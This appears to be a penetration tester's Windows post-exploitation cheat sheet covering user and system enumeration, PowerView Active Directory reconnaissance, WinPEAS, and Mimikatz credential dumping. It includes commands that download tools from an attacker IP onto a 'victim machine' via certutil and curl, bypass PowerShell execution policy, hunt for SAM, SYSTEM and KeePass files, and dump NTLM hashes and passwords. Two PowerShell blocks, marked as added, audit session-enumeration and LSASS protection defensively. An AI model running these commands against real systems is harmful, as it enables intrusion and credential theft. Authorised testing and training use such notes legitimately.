Windows
Points of Interest
Note: if the commands below are not found, try one of the following:
1. Run - PATH=%PATH%;c:\windows\system32
Alternate PATH - PATH=%PATH%;C:\windows\system32;C:\windows;C:\windows\System32\Wbem;C:\windows\System32\WindowsPowerShell\v1.0;C:\windows\System32\OpenSSH;C:\Program Files\dotnet\
2. Use the binary directly from C:\Windows\System32\
User Permissions
whoami
whoami /all
whoami /user
whoami /priv
whoami /groups
net user
wmic <user>
dir env:
Get-LocalUser
Local accounts
net user
net user <username> /domain
# Check if account is active in domain
net localgroup administrators
net share
net computer <computer name>
net accounts # Get password requirements
System Information
Key information -
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"
Network information -
netstat -ano
ipconfig
Current Console
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
Installed programs
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Interesting Files
where /r C:\Users\ *.txt
where /r C:\ local.txt
where /r C:\ proof.txt
where /r C:\ *.uac
where /r C:\ *.dll
dir C:\
To find specific files -
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.ini,*.log,*.ps1 -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Include SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Include local.txt,proof.txt -File -Recurse -ErrorAction SilentlyContinue
Web Root Directory
dir C:\inetpub\wwwroot
dir C:\xampp\htdocs
dir C:\<>\xampp\htdocs
Indications of a web root directory -
.htaccess, public_html, www, htdocs, httpdocs
Information Goldmine
Get-History
(Get-PSReadlineOption).HistorySavePath
Binary Analysis
powershell -ep bypass
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<service name>'}
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
# Avoid running Get-CimInstance in non-interactive shells (it may hang)
certutil.exe -urlcache -split -f http://<Kali IP>/Watch-Command.ps1 Watch-Command.ps1
Import-Module .\Watch-Command.ps1
Get-Process <process name> -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 30
icacls <binary full path>
PowerView
powershell -ep bypass
Import-Module .\PowerView.ps1
Commands:
Get-NetDomain OR Get-Domain
Get-NetUser
Get-NetUser -SPN | select samaccountname, serviceprincipalname
Get-NetUser <user CN name>
To filter the result, pipe the output into a select statement
Example: Get-NetUser | select cn, name, pwdlastset, lastlogon
Get-NetGroup
Get-NetGroup <Group name>
To filter the result, pipe the output into a select statement
Example: Get-NetGroup | select cn, member
Get-NetComputer
Get-NetComputer <Computer name>
To filter the result, pipe the output into a select statement
Example: Get-NetComputer | select cn, operatingsystem, dnshostname
Find-LocalAdminAccess
Get-NetSession -ComputerName <Computer name> -Verbose # Lists sessions (logged-on users) on the target computer
Who may call NetSessionEnum against a host is defined by the SrvsvcSessionInfo value (a binary security descriptor) under the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity
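To see what that descriptor actually grants, the following added example (not part of the original notes) decodes SrvsvcSessionInfo on the local host and flags whether Authenticated Users (S-1-5-11) are allowed to enumerate sessions, which is the condition a defender would want to tighten. It assumes a local PowerShell session able to read HKLM; the value may be absent when the built-in default descriptor is in effect.

```powershell
# Added example: audit who can enumerate sessions (NetSessionEnum) on this host.
$keyPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity'
$bytes = (Get-ItemProperty -Path $keyPath -ErrorAction SilentlyContinue).SrvsvcSessionInfo

if (-not $bytes) {
    Write-Output "SrvsvcSessionInfo not present; the server service's built-in default descriptor applies."
    return
}

# The value is a self-relative security descriptor in binary form; RawSecurityDescriptor parses it.
$sd = [System.Security.AccessControl.RawSecurityDescriptor]::new([byte[]]$bytes, 0)

# Print each DACL entry with a resolved principal name where the SID can be translated.
foreach ($ace in $sd.DiscretionaryAcl) {
    $sid = $ace.SecurityIdentifier
    try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $name = $sid.Value }
    [pscustomobject]@{
        Principal  = $name
        SID        = $sid.Value
        AceType    = $ace.AceType
        AccessMask = ('0x{0:X}' -f $ace.AccessMask)
    }
}

# Finding: an AccessAllowed entry for Authenticated Users means any domain account
# can list logged-on users here. Hardening scripts such as NetCease remove that entry.
$open = $sd.DiscretionaryAcl |
    Where-Object { $_.AceType -eq 'AccessAllowed' -and $_.SecurityIdentifier.Value -eq 'S-1-5-11' }
if ($open) {
    Write-Output 'FINDING: Authenticated Users may enumerate sessions on this host.'
} else {
    Write-Output 'OK: session enumeration is not granted to Authenticated Users.'
}
```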
Get-NetComputer | Select-Object Name, @{Name='IPAddress';Expression={(Resolve-DnsName $_.Name).IPAddress}}
Get-Acl <Registry hive>:<Registry Key path> | fl
Get-ObjectAcl -Identity <user name | group name>
# Look at ActiveDirectoryRights and SecurityIdentifier
Get-ObjectAcl -Identity <group name> | ?{$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
Get-ObjectAcl -Identity <group name> | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier,ActiveDirectoryRights
Convert-SIDToName <SID>
OR
"<SID>", "<SID>", "<SID>" | Convert-SIDToName
Get-NetGPO
Get-GPPermission -Name "<GPO displayname>" -All
Automated Enumeration
WinPEAS
On the attacker machine:
/usr/share/peass/winpeas/winPEASx64.exe
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/winPEASx64.exe
/usr/share/peass/winpeas/winPEASx86.exe
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/winPEASx86.exe
Transfer the matching executable to the compromised system
Run it and review the output
Mimikatz
On the Kali machine:
wget https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe
On the victim machine:
certutil -urlcache -split -f http://192.168.45.165/mimikatz.exe mimikatz.exe
curl http://192.168.45.165/mimikatz.exe -o mimikatz.exe
To Run:
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # Find user NTLM hash
lsadump::lsa /patch # Find krbtgt NTLM hash
OR
Pass the Mimikatz commands as arguments to the executable:
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"
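Whether sekurlsa::logonpasswords can read anything useful depends on how LSASS is protected. The following added example (not part of the original notes) reports the three settings a defender checks first: LSA protection (RunAsPPL), Credential Guard, and the WDigest UseLogonCredential value that controls cleartext caching. It assumes a local PowerShell session with read access to HKLM and CIM; the Win32_DeviceGuard class exists on Windows 10 / Server 2016 and later.

```powershell
# Added example: summarise LSASS credential-protection settings on the local host.
function Get-LsassHardeningStatus {
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    # RunAsPPL = 1 (or 2 on recent builds) runs LSASS as a protected process light.
    $ppl = if ($null -ne $lsa.RunAsPPL) { [int]$lsa.RunAsPPL } else { 0 }

    $wd = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -ErrorAction SilentlyContinue
    # UseLogonCredential = 1 keeps cleartext passwords in LSASS; absent means the OS default
    # (off on Windows 8.1 / Server 2012 R2 and later).
    $wdigest = if ($null -ne $wd.UseLogonCredential) { [int]$wd.UseLogonCredential } else { 0 }

    # SecurityServicesRunning contains 1 when Credential Guard is active, 2 for HVCI.
    $dg = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard -ErrorAction SilentlyContinue
    $credGuard = ($null -ne $dg) -and ($dg.SecurityServicesRunning -contains 1)

    $findings = @()
    if ($ppl -eq 0)      { $findings += 'LSA protection (RunAsPPL) is not enabled' }
    if (-not $credGuard) { $findings += 'Credential Guard is not running' }
    if ($wdigest -eq 1)  { $findings += 'WDigest UseLogonCredential=1 retains cleartext passwords' }

    [pscustomobject]@{
        RunAsPPL            = $ppl
        CredentialGuard     = $credGuard
        WDigestLogonCred    = $wdigest
        Findings            = $findings
    }
}

Get-LsassHardeningStatus
```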